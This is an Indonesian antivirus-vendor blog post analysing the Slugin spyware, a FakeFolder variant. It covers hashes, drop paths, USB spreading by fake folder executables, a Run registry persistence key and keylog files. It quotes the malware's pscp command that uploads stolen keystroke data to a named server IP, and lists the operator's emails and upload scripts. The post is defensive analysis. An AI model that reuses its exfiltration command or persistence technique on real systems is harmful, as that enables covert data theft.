Slugin, Variant dari FakeFolder

Posted in Spyware, Trojan, virus on Nov 20, 2016

slugin1

Win32/Slugin.A dengan Wplugin.dll-nya, sebuah ‘spyware‘, mungkin ‘trojan‘, yang cukup misterius, yang mungkin [lagi] kita kira hanya sebagai virus biasa dengan kemampuan ‘Kage Bunshin no Jutsu‘-nya Naruto, menggandakan diri dengan menyerupai folder.
Servernya sampai saat ini masih aktif, dan kemungkinan dia menggunakan perintah (command) dari Putty untuk melakukan transaksi data ke Paris, Perancis, yang diduga sebagai sarang (server) dimana virus berasal.

Dilihat dari sifat dan ulah dari virus Slugin ini, maka kami simpulkan bahwa virus ini masih keluarga dengan virus FakeFolder seperti pada postingan sebelumnya.

Karakteristik Virus

Nama induk virus: msn.exe

Dibuat menggunakan: (tidak diketahui, diduga menggunakan MinGW)

Ukuran: 416 KB (426.979 bytes)

SHA256: 9EDFBE4BBFDF1B2FB3E8C7C57DBEEE05F43A66CDF7B8352808BCE53F3023C247

 

Nama plguin yang diekstrak virus: Wplugin.dll

Dibuat menggunakan: Microsoft Visual C/C++(6.0)

Ukuran: 108 KB (110.592 bytes)

SHA256: 9C2726DEFA122089F8251FA104F76D66830F448774AB9BD634ADBB6E492E3943

 

Aksi Virus

Saat virus aktif di komputer korban, pertama-tama virus meletakkan induknya di:

  • C:\ProgramData\win\msn.exe

Dan di:

  • C:\win\msn.exe
    • Dengan command:
      • pscp|C:\Users\%NAMAUSER%~1\AppData\Local\Temp\\iosystem.dll|87.98.185.184:/ecoute/spool/%NAMAUSER%-%NAMAUSER%-4ED560BB-1479600820

Virus ini juga mencopykan diri ke setiap ditemukannya folder pada Flashdisk:

  • G:\honey_parent\sub 1.exe
  • G:\honey_parent\sub 2.exe
  • … dst

Sedangkan, untuk folder yang ada, folder yang asli, dia sembunyikan dengan atribut hidden.

Registry

Virus menambahkan nilai pada Registry agar bisa aktif saat komputer dinyalakan:

  • Windows Registry Editor Version 5.00
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    “apo5″=”C:\\ProgramData\\win\\msn.exe”

Pasukan Virus

Virus ini tak sendirian, virus ini mengekstrak file didalam dirinya dan diletakkan pada direktori / folder:

  • C:\Users\%NAMAUSER%\AppData\Roaming\Wplugin.dll

Tujuan menyisipkan file “Wplugin.dll” bagi virus Slugin ini adalah sebagai library (perpustakaan) fungsi yang sewaktu-waktu bisa digunakan virus untuk mengirim data hasil kegiatan mata-mata (keylogging) ke server virus.

Adapun data rekaman data hasil mata-matanya disimpan dalam file “.dll” yang padahal file plaintext:

  • C:\Users\%NAMAUSER%\AppData\Local\Temp\iosystem.dll

Bukan hanya data hasil keylogging, ada data khusus yang diprogram oleh pembuat virus ini agar dia (pembuat virus) mendapatkan data yang dia inginkan:

  • WND;;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • T5.255;c||NTFS|d|RYAN BEKABE|FAT32|e||NTFS;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • WND;SmartS;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • INFO;6;1;7601;1;0;256;1;0;4;XXXXX;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • KEY;XXXXX-DHTBF-Q6MMK-KYK6X-XXXXX;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB

Maka, dengan “Wplugin.dll” tersebut, data dari komputer korban bisa sampai ke tangan si pembuat virus, yang bisa saja dikirim melalui EMail ke:

  1. EMail: cvmb@hotmail.com
  2. sv003@yahoo.com

Atau melalui script upload dari server ASP si pembuat virus:

  1. UploadFile1.asp
  2. UploadFile2.asp
  3. KillServer.asp
  4. ChangeService.asp

Server Virus

Host Server: 87.98.185.184
Remote Port: 8829
Port: 22 (SSH, TCP)

Virus ini diduga berasal dari Paris, Perancis, atau hanya server-nya saja yang berada di Paris, bukan si Programmernya.

Adapun data dari perintah SSH yang dilakukan virus:

SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
SSH-2.0-.
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8

~diffie-hellman -group1-sha1,dif fie-hellman-grou p14-sha1,diffie- hellman-group-ex change-sha256,di ffie-hellman-gro up-exchange-sha1 ….ssh-rsa,ssh- dss….arcfour25 6,arcfour128…. arcfour256,arcfo ur128….hmac-sh a1,hmac-sha1-96, hmac-md5….hmac -sha1,hmac-sha1- 96,hmac-md5….n one,zlib….none ,zlib
Acurve25519-sha 256@libssh.org,d iffie-hellman-gr oup-exchange-sha 256….ssh-rsa,s sh-ed25519…lch acha20-poly1305@ openssh.com,aes2 56-gcm@openssh.c om,aes128-gcm@op enssh.com,aes256 -ctr,aes192-ctr, aes128-ctr…lch acha20-poly1305@ openssh.com,aes2 56-gcm@openssh.c om,aes128-gcm@op enssh.com,aes256 -ctr,aes192-ctr, aes128-ctr….hm ac-sha2-512-etm@ openssh.com,hmac -sha2-256-etm@op enssh.com,hmac-r ipemd160-etm@ope nssh.com,umac-12 8-etm@openssh.co m,hmac-sha2-512, hmac-sha2-256,hm ac-ripemd160,uma c-128@openssh.co m….hmac-sha2-5 12-etm@openssh.c om,hmac-sha2-256 -etm@openssh.com ,hmac-ripemd160- etm@openssh.com, umac-128-etm@ope nssh.com,hmac-sh a2-512,hmac-sha2 -256,hmac-ripemd 160,umac-128@ope nssh.com….none ,zlib@openssh.co m….none,zlib@o penssh.com

 

Cara Membersihkan Slugin

Jika Smadav belum mendeteksi virus ini, user tetap bisa menambahkan file atau proses virus ini sebagai virus (bagi Smadav) yakni dengan menggunakan fitur yang disediakan Smadav, seperti pada artikel kami sebelumnya.

 

10 Responses to “Slugin, Variant dari FakeFolder”


  1. shadow says:

    good app..

     
  2. dojenuwah says:

    install 2017 version

     
  3. Adugna says:

    Smadav is perfect.

     
  4. Anonymous says:

    downlod smadav

     


Leave a Reply


  • Search

    Loading
  • Wall

    Previous Next
    Latest on Fri, 02:06 pm

    daniel hailu: smadave flash antivires

    yadetageemechi: install antivirus

    clement ouedraogo: C'est vraiment le meilleur

    Bouba SISSOKO: Je vous remercie pour le service. Je voudrai que mon ordinateur soit protégé contre les objets malveillants.

    andrywahyuni: aku ingin yang lebih baik lagi

    aidan d. kimath: good

    nanda: bagus

    PALOMAN: LAFIA KODA WAHABOU

    LAFIA KODA WAHABOU: merci d'abord pour votre aide . Je voudrais bien que mon ordinateur soit protégé en toute sécurité contre n'importe quels virus...merci pour votre aimable compréhension

    Fihir Saranani,S.Si: Bersatu Kita Teguh Bercerai Kita Runtuh

    » Tuliskan komentar Anda :